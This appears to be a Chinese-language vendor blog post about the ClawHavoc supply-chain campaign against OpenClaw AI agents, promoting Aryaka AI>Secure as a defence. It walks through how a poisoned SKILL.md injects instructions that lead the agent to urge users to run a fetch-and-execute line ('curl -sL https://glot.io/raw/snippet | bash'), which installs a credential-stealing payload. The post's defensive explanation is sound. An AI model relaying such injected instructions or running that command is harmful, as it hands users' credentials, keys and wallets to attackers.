截至 2026 年 2 月,OpenClaw(前身为 Clawdbot 和 Moltbot)是自主人工智能代理的流行平台。其 “主权 “架构使人工智能能够直接访问文件系统和终端,大大增加了攻击面,导致风险上升,最明显的例子是 ClawHavoc 供应链活动,该活动使数千个部署暴露在潜在威胁之下。
本文回顾了 OpenClaw 的漏洞,并解释了 Aryaka AI>Secure 如何提供强大的多层风险缓解功能。
OpenClaw 漏洞和 ClawHavoc 背景
OpenClaw之所以易受攻击,主要有三个原因:
- 系统级访问:代理可以执行 shell 命令和访问凭证。
- 不受信任的输入:代理处理第三方内容,使其暴露于提示注入。
- 自主通信:代理可以在不受监督的情况下对外发送数据。
ClawHavoc 是一种利用这一生态系统的供应链攻击。2026 年 2 月,研究人员发现约有 12% 的 ClawHub 技能是恶意的,它们伪装成有用的工具,实际上却在窃取数字身份。
ClawHavoc 的工作原理感染剖析
ClawHavoc 是一种有状态的社会工程攻击,它利用了 OpenClaw 接收指令的方式。它遵循一个可重复的高效杀伤链:
- 第 1 步:中毒指令 (SKILL.md):攻击者将一个技能上传到 ClawHub。攻击的核心是 SKILL.md 文件。它包含一个 “先决条件 “部分,告诉代理(和用户)必须运行特定脚本才能 “初始化 “该工具。
- 第 2 步:通过 LLM 实施社交工程:当您要求代理使用该技能时,它会将恶意的 SKILL.md 读入其上下文。然后,LLM 会生成一个听起来很有用的回复:”要启用此功能,请在终端运行此命令:curl -sL https://glot.io/raw/snippet | bash”。
- 第 3 步:恶意软件有效载荷交付:如果用户执行了命令,它就会下载第二阶段的有效载荷–通常是原子窃取程序(AMOS)或键盘记录程序。这种恶意软件会窃取浏览器 cookie、密钥链和 OpenClaw 环境文件,以获取 API 密钥和加密钱包。
使用 Aryaka AI>Secure 阻止 ClawHavoc
作为深度包、人工智能感知的 MITM 代理,Aryaka AI>Secure 可拦截 ClawHavoc 攻击链中每个阶段的流量。
方法 1:阻止恶意技能下载
当用户运行 clawhub install 时,AI>Secure 会对注册表中的 HTTPS 流量进行解密。
- 保护:它不仅能看到文件,还能解析 SKILL.md 的 Markdown 内容。它使用语义检查来识别 “有毒指令”,如隐藏的 shell 命令或 ClawHavoc 活动中使用的已知片段共享网站链接。
- 结果:它在网络边缘阻止下载,防止恶意指令进入代理内存。
方法 2:响应语义过滤(指令防御)
如果你的机器上已经存在不良技能,AI>Secure 会通过检查 LLM 的输出提供第二层防御。
- 保护:当 LLM 告诉用户 “运行此脚本启用工具 “时,AI>Secure 的语义引擎会将其识别为 “安装程序欺诈”。它可以识别出人工智能正在被操纵,诱使人类采取危险行动。
- 结果:代理会从聊天流中删除命令或完全阻止信息,在用户界面上用安全警告代替。
方法 3:主动 URL 过滤和 SWG(有效载荷防御)
如果用户试图手动运行恶意 curl 命令或下载 “先决条件 “ZIP,AI>Secure 的安全 Web 网关 (SWG) 功能就会进行干预。
- 保护:AI>Secure 利用实时 URL Intelligence Feed 跟踪网络钓鱼域和恶意软件托管基础架构。
- 结果:当代理或用户尝试访问托管恶意软件有效载荷的特定 URL(如 glot.io 或 webhook.site)时,代理会将目的地识别为 “恶意 “或 “高风险”,并立即阻止请求。这样就能防止实际恶意软件被获取。
方法 4:运行时工具和数据锁定
如果恶意软件成功执行,AI>Secure 将成为您数据的最后一道关卡。
- 保护:它能理解 MCP(模型上下文协议)调用。如果受感染的代理尝试执行 shell 命令以外泄数据,AI>Secure 会识别异常目标。
- 结果:其新一代 DLP(数据丢失防护)会扫描所有出站数据,查找 “秘密”(API 密钥、SSH 头信息)。如果发现您的私人凭证离开网络,它就会终止会话并向安全团队发出警报。
结论
ClawHavoc 危机证明,对于自主代理而言,提示和技能表现是新的边界。通过利用像 Aryaka AI>Secure 这样以人工智能为中心的代理,您可以确保 OpenClaw 代理仍然是提高生产力的工具,而不是攻击者的网关。